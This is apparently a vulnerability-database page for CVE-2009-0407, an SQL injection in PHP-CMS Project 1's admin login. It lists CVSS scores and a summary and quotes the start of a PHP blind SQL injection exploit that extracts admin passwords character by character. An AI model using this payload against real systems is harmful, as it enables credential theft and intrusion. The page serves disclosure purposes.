7.5
CVSSv2

CVE-2009-0407

Published: 03/02/2009 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in admin/login.php in PHP-CMS Project 1 allows remote malicious users to execute arbitrary SQL commands via the username parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

humayun shabbir php-cms project 1

Exploits

--+++===================================================+++-- --+++====== PHP-CMS 1 Blind SQL Injection Exploit ======+++-- --+++===================================================+++-- <?php function query ($user, $pos, $chr) { $query = "x' OR IF((ASCII(SUBSTRING((SELECT password FROM " "admin WHERE username='{$user}'),{$pos},1))={$chr}) ...